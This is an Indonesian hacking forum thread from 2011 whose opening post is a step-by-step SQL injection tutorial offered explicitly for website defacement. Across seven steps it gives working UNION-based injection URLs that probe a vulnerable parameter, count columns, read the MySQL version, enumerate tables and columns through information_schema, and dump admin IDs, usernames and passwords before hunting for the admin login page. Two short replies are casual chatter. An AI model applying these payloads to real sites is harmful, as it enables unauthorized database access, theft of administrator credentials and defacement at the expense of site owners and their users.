Green Cyber
Selamat Datang di FORUM GC

Hidup lebih indah bila dipenuhi dengan teman dan sahabat yg mengerti dan
menerima diri kita apa adanya. Penuh ceria dan senda, mari bergabung di FORUM B2

FORUM GC sejak di buka mei 2011, suatu free service forum online
terbuka dan ajang ngobrol utk mencari sahabat, pacar, ato cari teman,
atau sesuatu yg belum pernah anda jumpai

FORUM GC adalah forum untuk kepentingan bersama. Di sini anda
dapat Men-Share ato Men-tanyakan sesuatu untuk dibahas. Anda juga bisa
request sesuatu.....
Untuk bergabung anda bisa Klik bagian PENDAFTARAN
Jika sudah terdaftar silahkan mengeklik Login

Salam Hangat,
FORUM GC

tambahan

kami ucapkan terimakasih banyak
Green Cyber
Selamat Datang di FORUM GC

Hidup lebih indah bila dipenuhi dengan teman dan sahabat yg mengerti dan
menerima diri kita apa adanya. Penuh ceria dan senda, mari bergabung di FORUM B2

FORUM GC sejak di buka mei 2011, suatu free service forum online
terbuka dan ajang ngobrol utk mencari sahabat, pacar, ato cari teman,
atau sesuatu yg belum pernah anda jumpai

FORUM GC adalah forum untuk kepentingan bersama. Di sini anda
dapat Men-Share ato Men-tanyakan sesuatu untuk dibahas. Anda juga bisa
request sesuatu.....
Untuk bergabung anda bisa Klik bagian PENDAFTARAN
Jika sudah terdaftar silahkan mengeklik Login

Salam Hangat,
FORUM GC

tambahan

kami ucapkan terimakasih banyak
Green Cyber
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Green Cyber

Community Cyber
 
IndeksPortalLatest imagesPencarianPendaftaranLogin

 

 Hacking With SQLi

Go down 
3 posters
PengirimMessage
th3_pun1sh3r
Moderator
Moderator
th3_pun1sh3r


Jumlah posting : 8
Reputation : 0
Join date : 14.05.11

Hacking With SQLi  Empty
PostSubyek: Hacking With SQLi    Hacking With SQLi  EmptySat May 14, 2011 7:11 pm

hacking website with SQL injection (untuk yg mo belajar deface)

Pengertian sql injection:

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.



Yang perlu di ketahui sebelum sql injection pada mysql:

karakter: ' atau -

comments: /* atau --

information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x



===========

=step Satu:=

===========



carilah target

misal: [site]/berita.php?id=100



Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

contoh:

Code:

[site]/berita.php?id=100' atau

[site]/berita.php?id=-100



sehingga muncul pesan error seperti berikut (masih bnyak lagi):





==========

=step Dua:=

==========



mencari dan menghitung jumlah table yang ada dalam databasenya...

gunakan perintah : order by



contoh:

Code:

[site]/berita.php?id=-100+order+by+1-- atau

[site]/berita.php?id=-100+order+by+1/*



ceklah secara step by step (satupersatu)...

misal:

Code:

[site]/berita.php?id=-100+order+by+1--

[site]/berita.php?id=-100+order+by+2--

[site]/berita.php?id=-100+order+by+3--

[site]/berita.php?id=-100+order+by+4--



sehingga muncul error atau hilang pesan error...

misal: [site]/berita.php?id=-100+order+by+9--



berarti yang kita ambil adalah sampai angka 8

menjadi [site]/berita.php?id=-100+order+by+8--





===========

=step Tiga:=

===========



untuk mengeluarkan angka berapa yang muncul gunakan perintah union

karena tadi error sampai angka 9

maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--



ok seumpama yg keluar angka 5



gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi

misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau

[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--



lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa

menggunakan perintah From+Information_schema..



untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..





===========

=step Empat:=

===========



untuk menampilkan semua isi dari table tsb adalah

perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_schema=database()--



=============

= step Lima: =

=============



perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table_name=0xhexa--



pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya

website yg digunakan untuk konversi http://www.palembanghackerlink.com/ascii-h4.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--



============

=step Enam:=

============



memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara



perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi

perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir



Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--



contoh kata yang keluar adalah id,username,password



Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--



==============

= step Tujuh:=

==============



tahap terakhir mencari halam admin atau login .





Silahkan DI pelajari Kaka gan kalo udah bisa silahkan PM ane buat yang selanjutnya cheers
Kembali Ke Atas Go down
http://black-cyber.tk
Admin Green|Cyber
Admin
Admin
Admin Green|Cyber


Jumlah posting : 63
Reputation : 4
Join date : 14.05.11

Hacking With SQLi  Empty
PostSubyek: Re: Hacking With SQLi    Hacking With SQLi  EmptySat May 14, 2011 7:56 pm

coba dulu mass bro,,,,

Laughing Laughing Laughing
Kembali Ke Atas Go down
https://green-cyber.forumid.net
whosyourdaddy
Këtûä Rt
Këtûä Rt
whosyourdaddy


Jumlah posting : 10
Reputation : 0
Join date : 15.05.11
Age : 30
Lokasi : Tangerang selatan

Hacking With SQLi  Empty
PostSubyek: Hacking With SQLi   Hacking With SQLi  EmptyWed Oct 05, 2011 11:15 pm

ini dia nih teknik yg paling ane suka..
walaupun belom pernah berhasil2 Sad
Kembali Ke Atas Go down
http://computer-techno.org/
Sponsored content





Hacking With SQLi  Empty
PostSubyek: Re: Hacking With SQLi    Hacking With SQLi  Empty

Kembali Ke Atas Go down
 
Hacking With SQLi
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Mencari Bug Suatu Web [XXS][SQLi][Lfi]

Permissions in this forum:Anda tidak dapat menjawab topik
Green Cyber :: Information Technology :: Hacking-
Navigasi: